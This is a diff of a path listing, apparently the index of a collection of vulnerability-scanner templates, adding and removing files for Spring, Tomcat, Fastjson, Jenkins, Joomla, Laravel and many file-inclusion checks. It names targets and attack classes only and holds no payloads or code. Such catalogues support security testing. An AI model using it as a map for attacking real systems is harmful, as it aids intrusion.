./poc/java/public-tomcat-instance.yaml
./poc/java/public-tomcat-manager-1.yaml
./poc/java/public-tomcat-manager-2.yaml
-./poc/java/public-tomcat-manager-9708.yaml
./poc/java/public-tomcat-manager-9709.yaml
./poc/java/public-tomcat-manager-9710.yaml
./poc/java/public-tomcat-manager-9711.yaml
@@ -48603,7 +48581,6 @@
./poc/java/shiro-124-rememberme.yaml
./poc/java/shiro-deserialization-detection.yaml
./poc/java/shiro-detect-10195.yaml
-./poc/java/shiro-detect-10196.yaml
./poc/java/shiro-detect-10197.yaml
./poc/java/spring-boot-admin.yaml
./poc/java/spring-cloud-cve-2020-5405.yml
@@ -48613,8 +48590,9 @@
./poc/java/spring-cve-2016-4977.yaml
./poc/java/spring-cve-2016-4977.yml
./poc/java/spring-eureka.yaml
-./poc/java/spring-framework-exceptions-10493.yaml
+./poc/java/spring-framework-exceptions.yaml
./poc/java/spring-framework.yaml
+./poc/java/springForShell-CVE-2022-22963.yaml
./poc/java/springForShell-CVE-2022-22965.yaml
./poc/java/spring_cloud_gateway_CVE_2022_22947.yaml
./poc/java/spring_cloud_gateway_cve_2022_22947.yaml
@@ -48622,20 +48600,18 @@
./poc/java/springboot-actuator-1.yaml
./poc/java/springboot-actuator-10433.yaml
./poc/java/springboot-actuator-10434.yaml
-./poc/java/springboot-actuator-10435.yaml
./poc/java/springboot-actuator-2.yaml
./poc/java/springboot-actuator-unauth.yaml
./poc/java/springboot-actuators-jolokia-xxe-1.yaml
./poc/java/springboot-actuators-jolokia-xxe-10428.yaml
./poc/java/springboot-actuators-jolokia-xxe-10429.yaml
-./poc/java/springboot-actuators-jolokia-xxe-10431.yaml
+./poc/java/springboot-actuators-jolokia-xxe-10430.yaml
./poc/java/springboot-actuators-jolokia-xxe-10432.yaml
./poc/java/springboot-actuators-jolokia-xxe-2.yaml
./poc/java/springboot-actuators-jolokia-xxe.yaml
./poc/java/springboot-autoconfig-1.yaml
./poc/java/springboot-autoconfig-10437.yaml
./poc/java/springboot-autoconfig-2.yaml
-./poc/java/springboot-autoconfig.yaml
./poc/java/springboot-beans-1.yaml
./poc/java/springboot-beans-10439.yaml
./poc/java/springboot-beans-10440.yaml
@@ -48643,6 +48619,7 @@
./poc/java/springboot-beans-2.yaml
./poc/java/springboot-conditions.yaml
./poc/java/springboot-configprops-1.yaml
+./poc/java/springboot-configprops-10442.yaml
./poc/java/springboot-configprops-10443.yaml
./poc/java/springboot-configprops-10444.yaml
./poc/java/springboot-configprops-10445.yaml
@@ -48655,6 +48632,7 @@
./poc/java/springboot-env-1.yaml
./poc/java/springboot-env-10448.yaml
./poc/java/springboot-env-10449.yaml
+./poc/java/springboot-env-10450.yaml
./poc/java/springboot-env-10451.yaml
./poc/java/springboot-env-2.yaml
./poc/java/springboot-env-unauth.yaml
@@ -48666,16 +48644,15 @@
./poc/java/springboot-h2-db-rce-10454.yaml
./poc/java/springboot-h2-db-rce-10455.yaml
./poc/java/springboot-h2-db-rce-10456.yaml
-./poc/java/springboot-h2-db-rce-10457.yaml
./poc/java/springboot-h2-db-rce-10458.yaml
+./poc/java/springboot-h2-db-rce.yaml
./poc/java/springboot-health-1.yaml
+./poc/java/springboot-health-10459.yaml
./poc/java/springboot-health-10460.yaml
./poc/java/springboot-health-2.yaml
-./poc/java/springboot-health.yaml
./poc/java/springboot-heapdump-1.yaml
./poc/java/springboot-heapdump-10461.yaml
./poc/java/springboot-heapdump-10462.yaml
-./poc/java/springboot-heapdump-10463.yaml
./poc/java/springboot-heapdump-10464.yaml
./poc/java/springboot-heapdump-10465.yaml
./poc/java/springboot-heapdump-2.yaml
@@ -48687,6 +48664,7 @@
./poc/java/springboot-httptrace-10469.yaml
./poc/java/springboot-httptrace-2.yaml
./poc/java/springboot-info-10470.yaml
+./poc/java/springboot-info.yaml
./poc/java/springboot-jolokia.yaml
./poc/java/springboot-log4j-rce-10472.yaml
./poc/java/springboot-log4j-rce-10473.yaml
@@ -48694,13 +48672,13 @@
./poc/java/springboot-logfile.yaml
./poc/java/springboot-loggers-1.yaml
./poc/java/springboot-loggers-10475.yaml
-./poc/java/springboot-loggers-10476.yaml
+./poc/java/springboot-loggers-10477.yaml
./poc/java/springboot-loggers-2.yaml
./poc/java/springboot-loggers.yaml
./poc/java/springboot-mappings-1.yaml
+./poc/java/springboot-mappings-10478.yaml
./poc/java/springboot-mappings-10479.yaml
./poc/java/springboot-mappings-10480.yaml
-./poc/java/springboot-mappings-10481.yaml
./poc/java/springboot-mappings-2.yaml
./poc/java/springboot-mappings.yaml
./poc/java/springboot-metrics-1.yaml
@@ -48711,14 +48689,12 @@
./poc/java/springboot-threaddump-1.yaml
./poc/java/springboot-threaddump-10484.yaml
./poc/java/springboot-threaddump-10485.yaml
-./poc/java/springboot-threaddump-10486.yaml
./poc/java/springboot-threaddump-10487.yaml
./poc/java/springboot-threaddump-2.yaml
./poc/java/springboot-trace-10488.yaml
./poc/java/springboot-trace-10489.yaml
./poc/java/springboot-trace-10491.yaml
./poc/java/springboot-trace-10492.yaml
-./poc/java/springboot-trace.yaml
./poc/java/springboot-whitelabel.yaml
./poc/java/springboot-workflow.yaml
./poc/java/springboot2.x_eureka_rce.yaml
@@ -48733,7 +48709,7 @@
./poc/java/struts-debug-mode-10560.yaml
./poc/java/struts-debug-mode.yaml
./poc/java/struts-problem-report-10562.yaml
-./poc/java/struts-problem-report-10563.yaml
+./poc/java/struts-problem-report-10564.yaml
./poc/java/struts-problem-report.yaml
./poc/java/struts2_001.yaml
./poc/java/sun-glassfish.yaml
@@ -48748,6 +48724,7 @@
./poc/java/tomcat-default-login-10789.yaml
./poc/java/tomcat-default-login-10790.yaml
./poc/java/tomcat-default-login-10791.yaml
+./poc/java/tomcat-default-login.yaml
./poc/java/tomcat-default-manager.yaml
./poc/java/tomcat-detect-10792.yaml
./poc/java/tomcat-detect-10793.yaml
@@ -48785,7 +48762,6 @@
./poc/java/tomcat-pathnormalization-10799.yaml
./poc/java/tomcat-pathnormalization-10800.yaml
./poc/java/tomcat-pathnormalization-2.yaml
-./poc/java/tomcat-pathnormalization.yaml
./poc/java/tomcat-scripts-1.yaml
./poc/java/tomcat-scripts-10801.yaml
./poc/java/tomcat-scripts-10802.yaml
@@ -48832,11 +48808,10 @@
./poc/java/weblogic-ssrf.yaml
./poc/java/weblogic-ssrf.yml
./poc/java/weblogic-t3-detect-11151.yaml
-./poc/java/weblogic-t3-detect-11152.yaml
+./poc/java/weblogic-t3-detect-11153.yaml
./poc/java/weblogic-t3-detect.yaml
./poc/java/weblogic-t3-search.yaml
./poc/java/weblogic-uddiexplorer.yaml
-./poc/java/weblogic-weak-login-11154.yaml
./poc/java/weblogic-weak-login-11155.yaml
./poc/java/weblogic-weak-login-11156.yaml
./poc/java/weblogic-workflow-11157.yaml
@@ -48844,12 +48819,12 @@
./poc/java/websphere-portal-preauth-ssrf.yaml
./poc/java/websphere-version-detect.yaml
./poc/java/webview-addjavascript-interface-11175.yaml
-./poc/java/webview-addjavascript-interface-11177.yaml
+./poc/java/webview-addjavascript-interface-11176.yaml
./poc/java/webview-addjavascript-interface.yaml
./poc/java/webview-javascript-11178.yaml
./poc/java/webview-javascript.yaml
+./poc/java/wildfly-panel-11209.yaml
./poc/java/wildfly-panel-11210.yaml
-./poc/java/wildfly-panel-11211.yaml
./poc/java/wildfly-panel.yaml
./poc/java/wildfly-server.yaml
./poc/java/wpdbspringclean-ec00604b0e8ff72061ba569674a03777.yaml
@@ -48903,8 +48878,8 @@
./poc/javascript/auth-json.yaml
./poc/javascript/azuredeploy-json.yaml
./poc/javascript/bower-json-768.yaml
-./poc/javascript/bower-json-769.yaml
./poc/javascript/bower-json-770.yaml
+./poc/javascript/bower-json.yaml
./poc/javascript/composer-auth-json.yaml
./poc/javascript/config-js.yaml
./poc/javascript/credentials-json.yaml
@@ -48951,19 +48926,21 @@
./poc/javascript/fastjson-1-2-24-rce-1.yaml
./poc/javascript/fastjson-1-2-24-rce-2.yaml
./poc/javascript/fastjson-1-2-24-rce-7400.yaml
-./poc/javascript/fastjson-1-2-24-rce.yaml
./poc/javascript/fastjson-1-2-41-rce-7401.yaml
./poc/javascript/fastjson-1-2-41-rce-7403.yaml
./poc/javascript/fastjson-1-2-41-rce-7404.yaml
+./poc/javascript/fastjson-1-2-41-rce.yaml
./poc/javascript/fastjson-1-2-42-rce-7405.yaml
./poc/javascript/fastjson-1-2-42-rce-7407.yaml
-./poc/javascript/fastjson-1-2-42-rce.yaml
+./poc/javascript/fastjson-1-2-42-rce-7408.yaml
./poc/javascript/fastjson-1-2-43-rce-7409.yaml
./poc/javascript/fastjson-1-2-43-rce-7411.yaml
+./poc/javascript/fastjson-1-2-43-rce-7412.yaml
./poc/javascript/fastjson-1-2-47-rce-7413.yaml
./poc/javascript/fastjson-1-2-47-rce-7415.yaml
./poc/javascript/fastjson-1-2-47-rce-7416.yaml
./poc/javascript/fastjson-1-2-62-rce-7417.yaml
+./poc/javascript/fastjson-1-2-62-rce-7419.yaml
./poc/javascript/fastjson-1-2-62-rce-7420.yaml
./poc/javascript/fastjson-1-2-67-rce-7421.yaml
./poc/javascript/fastjson-1-2-67-rce-7423.yaml
@@ -49093,10 +49070,9 @@
./poc/javascript/jsbe.yaml
./poc/javascript/jsconfig-json.yaml
./poc/javascript/jsf-detection-8396.yaml
-./poc/javascript/jsf-detection-8397.yaml
+./poc/javascript/jsf-detection-8398.yaml
./poc/javascript/jsf-detection.yaml
./poc/javascript/jsf.yaml
-./poc/javascript/jsherp-boot-panel.yaml
./poc/javascript/jsmol2wp-6fc39d92daef6aed5760a4b5f8458d00.yaml
./poc/javascript/jsmol2wp-d5be42322ff31dc7bf613195f697a548.yaml
./poc/javascript/jsmol2wp.yaml
@@ -49124,7 +49100,7 @@
./poc/javascript/jsyhit-system.yaml
./poc/javascript/jwks-json.yaml
./poc/javascript/keycloak-json-8471.yaml
-./poc/javascript/keycloak-json-8472.yaml
+./poc/javascript/keycloak-json-8473.yaml
./poc/javascript/keycloak-json-8474.yaml
./poc/javascript/keys-js.yaml
./poc/javascript/knight-lab-timelinejs-0f42e86470e92d725c0f62d2c358c29e.yaml
@@ -49152,9 +49128,9 @@
./poc/javascript/ojs-unauthenticated-open-redirect.yaml
./poc/javascript/package-json-1.yaml
./poc/javascript/package-json-2.yaml
+./poc/javascript/package-json-9421.yaml
./poc/javascript/package-json-9422.yaml
./poc/javascript/package-json-9423.yaml
-./poc/javascript/package-json.yaml
./poc/javascript/pdfjs-viewer-shortcode-901f07b1c8adb20b4d89c03c0e4b0f6e.yaml
./poc/javascript/pdfjs-viewer-shortcode-9f8b34f5ac9a5f3aa8eca1410ed341dd.yaml
./poc/javascript/pdfjs-viewer-shortcode-a8f0b32d7cfb6af435cac07ab61c5de1.yaml
@@ -49191,7 +49167,7 @@
./poc/javascript/wanhu-ezoffice-smartupload-jsp-fileupload.yaml
./poc/javascript/wanhu-ezoffice-upload-jsp-fileupload.yaml
./poc/javascript/webview-addjavascript-interface-11175.yaml
-./poc/javascript/webview-addjavascript-interface-11177.yaml
+./poc/javascript/webview-addjavascript-interface-11176.yaml
./poc/javascript/webview-addjavascript-interface.yaml
./poc/javascript/webview-javascript-11178.yaml
./poc/javascript/webview-javascript.yaml
@@ -49236,26 +49212,27 @@
./poc/jenkins/jenkins-cve-2018-1000861-rce.yml
./poc/jenkins/jenkins-default-8270.yaml
./poc/jenkins/jenkins-default-8271.yaml
+./poc/jenkins/jenkins-default-8272.yaml
./poc/jenkins/jenkins-default-8273.yaml
./poc/jenkins/jenkins-default-login.yaml
./poc/jenkins/jenkins-default-pwd.yaml
-./poc/jenkins/jenkins-default.yaml
./poc/jenkins/jenkins-detect-8274.yaml
-./poc/jenkins/jenkins-detect-8275.yaml
+./poc/jenkins/jenkins-detect-8276.yaml
./poc/jenkins/jenkins-detect.yaml
./poc/jenkins/jenkins-exposed.yaml
./poc/jenkins/jenkins-headers-detect.yaml
./poc/jenkins/jenkins-home-dir-exposure.yaml
-./poc/jenkins/jenkins-login-8277.yaml
./poc/jenkins/jenkins-login-8278.yaml
./poc/jenkins/jenkins-login-8279.yaml
+./poc/jenkins/jenkins-login-8280.yaml
./poc/jenkins/jenkins-login-detection.yaml
./poc/jenkins/jenkins-login.yaml
./poc/jenkins/jenkins-rce.yaml
./poc/jenkins/jenkins-script-8281.yaml
./poc/jenkins/jenkins-script-8282.yaml
./poc/jenkins/jenkins-script-8283.yaml
-./poc/jenkins/jenkins-script-8284.yaml
+./poc/jenkins/jenkins-script.yaml
+./poc/jenkins/jenkins-stack-trace-8285.yaml
./poc/jenkins/jenkins-stack-trace-8286.yaml
./poc/jenkins/jenkins-stack-trace-8287.yaml
./poc/jenkins/jenkins-stack-trace-8288.yaml
@@ -49301,9 +49278,9 @@
./poc/joomla/freejoomlas.yaml
./poc/joomla/joomla-cnvd-2019-34135-rce.yml
./poc/joomla/joomla-com-fabrik-lfi-8370.yaml
-./poc/joomla/joomla-com-fabrik-lfi-8371.yaml
./poc/joomla/joomla-com-fabrik-lfi-8372.yaml
./poc/joomla/joomla-com-fabrik-lfi-8373.yaml
+./poc/joomla/joomla-com-fabrik-lfi.yaml
./poc/joomla/joomla-component-vreview-sql.yaml
./poc/joomla/joomla-component-vreview-sql.yml
./poc/joomla/joomla-config-dist-file.yaml
@@ -49317,7 +49294,7 @@
./poc/joomla/joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml
./poc/joomla/joomla-file-listing-8378.yaml
./poc/joomla/joomla-file-listing-8379.yaml
-./poc/joomla/joomla-file-listing.yaml
+./poc/joomla/joomla-file-listing-8380.yaml
./poc/joomla/joomla-host-injection.yaml
./poc/joomla/joomla-htaccess-8381.yaml
./poc/joomla/joomla-htaccess-8382.yaml
@@ -49331,8 +49308,8 @@
./poc/joomla/joomla-manifest-file-8387.yaml
./poc/joomla/joomla-manifest-file-8388.yaml
./poc/joomla/joomla-manifest-file.yaml
+./poc/joomla/joomla-panel-8389.yaml
./poc/joomla/joomla-panel-8390.yaml
-./poc/joomla/joomla-panel-8391.yaml
./poc/joomla/joomla-panel-8392.yaml
./poc/joomla/joomla-panel.yaml
./poc/joomla/joomla-sensitive-config.yaml
@@ -49351,13 +49328,14 @@
./poc/joomla/joomla-version.yaml
./poc/joomla/joomla-workflow-8393.yaml
./poc/joomla/joomla-workflow-8394.yaml
-./poc/joomla/joomla-workflow.yaml
./poc/joomla/joomla.yaml
./poc/joomla/rusty-joomla-9955.yaml
+./poc/joomla/rusty-joomla.yaml
./poc/kafka/apache-druid-kafka-connect-rce.yaml
./poc/kafka/kafka-center-default-login-8415.yaml
./poc/kafka/kafka-center-default-login-8416.yaml
./poc/kafka/kafka-center-default-login-8417.yaml
+./poc/kafka/kafka-center-default-login.yaml
./poc/kafka/kafka-center-default-password.yaml
./poc/kafka/kafka-center-login-8419.yaml
./poc/kafka/kafka-center-login.yaml
@@ -49366,7 +49344,7 @@
./poc/kafka/kafka-connect-ui-8422.yaml
./poc/kafka/kafka-connect-ui-8423.yaml
./poc/kafka/kafka-connect-ui.yaml
-./poc/kafka/kafka-consumer-monitor-8425.yaml
+./poc/kafka/kafka-consumer-monitor-8424.yaml
./poc/kafka/kafka-consumer-monitor.yaml
./poc/kafka/kafka-cruise-control-8426.yaml
./poc/kafka/kafka-cruise-control-8427.yaml
@@ -49374,9 +49352,9 @@
./poc/kafka/kafka-manager-unauth.yml
./poc/kafka/kafka-manager.yaml
./poc/kafka/kafka-misconfig.yaml
+./poc/kafka/kafka-monitoring-8428.yaml
./poc/kafka/kafka-monitoring-8429.yaml
./poc/kafka/kafka-monitoring-8430.yaml
-./poc/kafka/kafka-monitoring-8431.yaml
./poc/kafka/kafka-monitoring.yaml
./poc/kafka/kafka-topics-list.yaml
./poc/kafka/kafka-topics-ui-8432.yaml
@@ -49409,10 +49387,8 @@
./poc/laravel/laravel-cve-2021-3129.yml
./poc/laravel/laravel-debug-enabled-8574.yaml
./poc/laravel/laravel-debug-enabled-8575.yaml
-./poc/laravel/laravel-debug-enabled-8576.yaml
./poc/laravel/laravel-debug-enabled-8577.yaml
./poc/laravel/laravel-debug-enabled-8578.yaml
-./poc/laravel/laravel-debug-enabled.yaml
./poc/laravel/laravel-debug-error-8579.yaml
./poc/laravel/laravel-debug-error.yaml
./poc/laravel/laravel-debug-info-leak.yaml
@@ -49422,6 +49398,7 @@
./poc/laravel/laravel-detect.yaml
./poc/laravel/laravel-env-8580.yaml
./poc/laravel/laravel-env-8581.yaml
+./poc/laravel/laravel-env-8582.yaml
./poc/laravel/laravel-env-8583.yaml
./poc/laravel/laravel-env-8584.yaml
./poc/laravel/laravel-env-8585.yaml
@@ -49436,11 +49413,11 @@
./poc/laravel/laravel-framework.yaml
./poc/laravel/laravel-ignition-xss-8592.yaml
./poc/laravel/laravel-ignition-xss-8593.yaml
+./poc/laravel/laravel-ignition-xss.yaml
./poc/laravel/laravel-improper-webdir.yaml
./poc/laravel/laravel-improper-webdir.yml
./poc/laravel/laravel-log-file-8594.yaml
./poc/laravel/laravel-log-file-8595.yaml
-./poc/laravel/laravel-log-file-8596.yaml
./poc/laravel/laravel-log-file-8597.yaml
./poc/laravel/laravel-log-file-8598.yaml
./poc/laravel/laravel-telescope-8599.yaml
@@ -49484,6 +49461,7 @@
./poc/ldap/ldap-wp-login-integration-with-active-directory.yaml
./poc/ldap/ldap-wp-login-xss.yaml
./poc/ldap/phpldap-admin.yaml
+./poc/ldap/phpldapadmin-panel.yaml
./poc/ldap/phpldapadmin-xss.yaml
./poc/ldap/phpldapadmin.yaml
./poc/ldap/teampass-ldap.yaml
@@ -49509,48 +49487,42 @@
./poc/local_file_inclusion/Wordpress-jQuery_Mega_Menu_Plugins-LFI.yaml
./poc/local_file_inclusion/accent-microcomputers-lfi-14.yaml
./poc/local_file_inclusion/accent-microcomputers-lfi-15.yaml
-./poc/local_file_inclusion/accent-microcomputers-lfi-17.yaml
-./poc/local_file_inclusion/ad-widget-lfi-124.yaml
+./poc/local_file_inclusion/accent-microcomputers-lfi-16.yaml
./poc/local_file_inclusion/ad-widget-lfi-125.yaml
./poc/local_file_inclusion/ad-widget-lfi-126.yaml
+./poc/local_file_inclusion/admin-word-count-column-lfi-81.yaml
./poc/local_file_inclusion/admin-word-count-column-lfi.yaml
+./poc/local_file_inclusion/advanced-access-manager-lfi-116.yaml
./poc/local_file_inclusion/advanced-access-manager-lfi-117.yaml
-./poc/local_file_inclusion/advanced-access-manager-lfi-118.yaml
-./poc/local_file_inclusion/advanced-access-manager-lfi.yaml
./poc/local_file_inclusion/advanced-access-manager-plugin-lfi.yaml
./poc/local_file_inclusion/alertlist-lfi.yaml
./poc/local_file_inclusion/alibaba-anyproxy-lfi.yaml
./poc/local_file_inclusion/amministrazione-aperta-lfi.yaml
./poc/local_file_inclusion/apachesolrlfissrf.yaml
./poc/local_file_inclusion/asanhamayesh-cms-lfi.yaml
-./poc/local_file_inclusion/asanhamayesh-lfi-552.yaml
+./poc/local_file_inclusion/asanhamayesh-lfi-553.yaml
./poc/local_file_inclusion/asanhamayesh-lfi.yaml
./poc/local_file_inclusion/bems-api-lfi-707.yaml
./poc/local_file_inclusion/bems-api-lfi-708.yaml
-./poc/local_file_inclusion/bems-api-lfi-709.yaml
./poc/local_file_inclusion/bems-api-lfi-710.yaml
./poc/local_file_inclusion/bems-api-lfi-711.yaml
-./poc/local_file_inclusion/bems-api-lfi-712.yaml
./poc/local_file_inclusion/blue-ocean-excellence-lfi-755.yaml
-./poc/local_file_inclusion/blue-ocean-excellence-lfi-756.yaml
./poc/local_file_inclusion/blue-ocean-excellence-lfi-757.yaml
./poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml
./poc/local_file_inclusion/brandfolder-lfi-777.yaml
./poc/local_file_inclusion/brandfolder-lfi-778.yaml
-./poc/local_file_inclusion/brandfolder-lfi.yaml
./poc/local_file_inclusion/bullwark-momentum-lfi-804.yaml
./poc/local_file_inclusion/bullwark-momentum-lfi-805.yaml
./poc/local_file_inclusion/bullwark-momentum-lfi-806.yaml
-./poc/local_file_inclusion/bullwark-momentum-lfi-807.yaml
./poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml
./poc/local_file_inclusion/cab-fare-calculator-lfi-819.yaml
./poc/local_file_inclusion/cab-fare-calculator-lfi.yaml
./poc/local_file_inclusion/candidate-application-lfi.yaml
./poc/local_file_inclusion/cherry-lfi-902.yaml
+./poc/local_file_inclusion/cherry-lfi-903.yaml
./poc/local_file_inclusion/church-admin-lfi-912.yaml
./poc/local_file_inclusion/church-admin-lfi-913.yaml
./poc/local_file_inclusion/churchope-lfi-915.yaml
-./poc/local_file_inclusion/churchope-lfi.yaml
./poc/local_file_inclusion/coldfusion-cve-2010-2861-lfi.yml
./poc/local_file_inclusion/comfyui-lfi.yaml
./poc/local_file_inclusion/confluence-cve-2019-3396-lfi.yaml
@@ -49560,15 +49532,15 @@
./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1281.yaml
./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1282.yaml
./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1283.yaml
-./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1285.yaml
+./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1284.yaml
+./poc/local_file_inclusion/cs-cart-unauthenticated-lfi.yaml
./poc/local_file_inclusion/dahua-icc-readPic-lfi.yaml
-./poc/local_file_inclusion/db-backup-lfi-6774.yaml
+./poc/local_file_inclusion/db-backup-lfi-6775.yaml
./poc/local_file_inclusion/db-backup-lfi-6776.yaml
./poc/local_file_inclusion/db-backup-lfi.yaml
./poc/local_file_inclusion/diarise-theme-lfi-6990.yaml
./poc/local_file_inclusion/diarise-theme-lfi-6991.yaml
./poc/local_file_inclusion/diarise-theme-lfi-6992.yaml
-./poc/local_file_inclusion/diarise-theme-lfi.yaml
./poc/local_file_inclusion/dicoogle-pacs-lfi-6993.yaml
./poc/local_file_inclusion/dicoogle-pacs-lfi-6994.yaml
./poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml
@@ -49580,17 +49552,15 @@
./poc/local_file_inclusion/eibiz-lfi-7186.yaml
./poc/local_file_inclusion/eibiz-lfi-7187.yaml
./poc/local_file_inclusion/eibiz-server-3-8-0-lfi.yaml
-./poc/local_file_inclusion/elFinder-path-traversal.yaml
./poc/local_file_inclusion/elasticsearch-cve-2015-3337-lfi.yml
./poc/local_file_inclusion/elfinder-detect-1.yaml
./poc/local_file_inclusion/elfinder-detect-2.yaml
./poc/local_file_inclusion/elfinder-detect-7201.yaml
./poc/local_file_inclusion/elfinder-detect-7202.yaml
-./poc/local_file_inclusion/elfinder-path-traversal-7203.yaml
+./poc/local_file_inclusion/elfinder-path-traversal.yaml
./poc/local_file_inclusion/elfinder-rce.yaml
./poc/local_file_inclusion/elfinder-version-7204.yaml
./poc/local_file_inclusion/elfinder-version-7205.yaml
-./poc/local_file_inclusion/elfinder-version.yaml
./poc/local_file_inclusion/ewebs-lfi.yaml
./poc/local_file_inclusion/fhem-6-unauthenticated-lfi.yaml
./poc/local_file_inclusion/flink-jobmanager-cve-2020-17519-lfi.yml
@@ -49601,6 +49571,7 @@
./poc/local_file_inclusion/generic-linux-lfi-7589.yaml
./poc/local_file_inclusion/generic-linux-lfi.yaml
./poc/local_file_inclusion/generic-windows-lfi-7590.yaml
+./poc/local_file_inclusion/generic-windows-lfi-7591.yaml
./poc/local_file_inclusion/generic-windows-lfi-7592.yaml
./poc/local_file_inclusion/generic-windows-lfi.yaml
./poc/local_file_inclusion/geovision-geowebserver-lfi-1.yaml
@@ -49612,17 +49583,20 @@
./poc/local_file_inclusion/global-domains-lfi-7714.yaml
./poc/local_file_inclusion/global-domains-lfi-7715.yaml
./poc/local_file_inclusion/global-domains-lfi-7716.yaml
+./poc/local_file_inclusion/global-domains-lfi.yaml
./poc/local_file_inclusion/goip-1-lfi-7761.yaml
./poc/local_file_inclusion/goip-1-lfi-7762.yaml
./poc/local_file_inclusion/goip-1-lfi-7763.yaml
-./poc/local_file_inclusion/goip-1-lfi-7764.yaml
+./poc/local_file_inclusion/groupoffice-lfi-7849.yaml
./poc/local_file_inclusion/groupoffice-lfi-7850.yaml
./poc/local_file_inclusion/groupoffice-lfi-7851.yaml
+./poc/local_file_inclusion/groupoffice-lfi.yaml
./poc/local_file_inclusion/gsoap-lfi-7853.yaml
./poc/local_file_inclusion/gsoap-lfi-7854.yaml
./poc/local_file_inclusion/gsoap-lfi-7855.yaml
./poc/local_file_inclusion/gsoap-lfi-7856.yaml
./poc/local_file_inclusion/gsoap-lfi-7857.yaml
+./poc/local_file_inclusion/gsoap-lfi.yaml
./poc/local_file_inclusion/hb-audio-lfi-7911.yaml
./poc/local_file_inclusion/hb-audio-lfi-7912.yaml
./poc/local_file_inclusion/hb-audio-lfi-7913.yaml
@@ -49631,7 +49605,6 @@
./poc/local_file_inclusion/hide-security-enhancer-lfi-7951.yaml
./poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml
./poc/local_file_inclusion/hide-security-enhancer-lfi-7953.yaml
-./poc/local_file_inclusion/hide-security-enhancer-lfi.yaml
./poc/local_file_inclusion/hikvision-orgs-download-lfi.yaml
./poc/local_file_inclusion/hjsoft-eHR-outputcode-lfi.yaml
./poc/local_file_inclusion/hrsale-unauthenticated-lfi-8039.yaml
@@ -49639,13 +49612,11 @@
./poc/local_file_inclusion/hrsale-unauthenticated-lfi-8041.yaml
./poc/local_file_inclusion/huawei-firewall-lfi.yaml
./poc/local_file_inclusion/huawei-hg255s-lfi-8059.yaml
-./poc/local_file_inclusion/huawei-hg255s-lfi-8060.yaml
./poc/local_file_inclusion/huawei-hg255s-lfi-8061.yaml
./poc/local_file_inclusion/huawei-hg659-lfi-8068.yaml
./poc/local_file_inclusion/huawei-hg659-lfi-8069.yaml
./poc/local_file_inclusion/huawei-hg659-lfi-8070.yaml
./poc/local_file_inclusion/huawei-hg659-lfi-8071.yaml
-./poc/local_file_inclusion/huawei-hg659-lfi.yaml
./poc/local_file_inclusion/ibm-infoprint-lfi-8101.yaml
./poc/local_file_inclusion/ibm-infoprint-lfi-8102.yaml
./poc/local_file_inclusion/ibm-infoprint-lfi-8103.yaml
@@ -49656,24 +49627,25 @@
./poc/local_file_inclusion/issuu-panel-lfi-8198.yaml
./poc/local_file_inclusion/issuu-panel-lfi-8199.yaml
./poc/local_file_inclusion/issuu-panel-lfi-8200.yaml
+./poc/local_file_inclusion/issuu-panel-lfi.yaml
./poc/local_file_inclusion/jeewms-lfi-1.yaml
./poc/local_file_inclusion/jeewms-lfi-2.yaml
./poc/local_file_inclusion/jeewms-lfi-8252.yaml
./poc/local_file_inclusion/jeewms-lfi-8253.yaml
./poc/local_file_inclusion/jeewms-lfi-8254.yaml
./poc/local_file_inclusion/jeewms-lfi-8255.yaml
-./poc/local_file_inclusion/jeewms-lfi.yaml
-./poc/local_file_inclusion/jinfornet-jreport-lfi-8308.yaml
+./poc/local_file_inclusion/jinfornet-jreport-lfi-8307.yaml
./poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml
./poc/local_file_inclusion/jinfornet-jreport-lfi-8310.yaml
./poc/local_file_inclusion/jinfornet-jreport-lfi.yaml
./poc/local_file_inclusion/jinhe-oa-c6-filedownload-lfi.yaml
-./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8364.yaml
./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8365.yaml
+./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8366.yaml
+./poc/local_file_inclusion/jolokia-unauthenticated-lfi.yaml
./poc/local_file_inclusion/joomla-com-fabrik-lfi-8370.yaml
-./poc/local_file_inclusion/joomla-com-fabrik-lfi-8371.yaml
./poc/local_file_inclusion/joomla-com-fabrik-lfi-8372.yaml
./poc/local_file_inclusion/joomla-com-fabrik-lfi-8373.yaml
+./poc/local_file_inclusion/joomla-com-fabrik-lfi.yaml
./poc/local_file_inclusion/joomla-lfi-comfabrik.yaml
./poc/local_file_inclusion/karel-ip-phone-lfi-8436.yaml
./poc/local_file_inclusion/karel-ip-phone-lfi-8437.yaml
@@ -49698,6 +49670,7 @@
./poc/local_file_inclusion/lfi-fuzz.yaml
./poc/local_file_inclusion/lfi-j2ee.yaml
./poc/local_file_inclusion/lfi-keyed.yaml
+./poc/local_file_inclusion/lfi-linux-fuzz.yaml
./poc/local_file_inclusion/lfi-linux.yaml
./poc/local_file_inclusion/lfi-vuln-params.yaml
./poc/local_file_inclusion/lfi-windows.yaml
@@ -49719,13 +49692,13 @@
./poc/local_file_inclusion/metinfo-lfi-8839.yaml
./poc/local_file_inclusion/metinfo-lfi-8840.yaml
./poc/local_file_inclusion/metinfo-lfi-cnvd-2018-13393.yml
+./poc/local_file_inclusion/minimouse-lfi-8877.yaml
./poc/local_file_inclusion/minimouse-lfi-8878.yaml
./poc/local_file_inclusion/minimouse-lfi-8879.yaml
./poc/local_file_inclusion/minimouse-lfi-8880.yaml
./poc/local_file_inclusion/minimouse-lfi-8881.yaml
./poc/local_file_inclusion/minimouse-lfi.yaml
./poc/local_file_inclusion/moodle-filter-jmol-lfi-8937.yaml
-./poc/local_file_inclusion/moodle-filter-jmol-lfi-8938.yaml
./poc/local_file_inclusion/moodle-filter-jmol-lfi-8939.yaml
./poc/local_file_inclusion/moodle-filter-jmol-lfi-8940.yaml
./poc/local_file_inclusion/moodle-filter-jmol-lfi-8941.yaml
@@ -49736,7 +49709,6 @@
./poc/local_file_inclusion/mpsec-lfi-8955.yaml
./poc/local_file_inclusion/mpsec-lfi-8956.yaml
./poc/local_file_inclusion/mpsec-lfi-8957.yaml
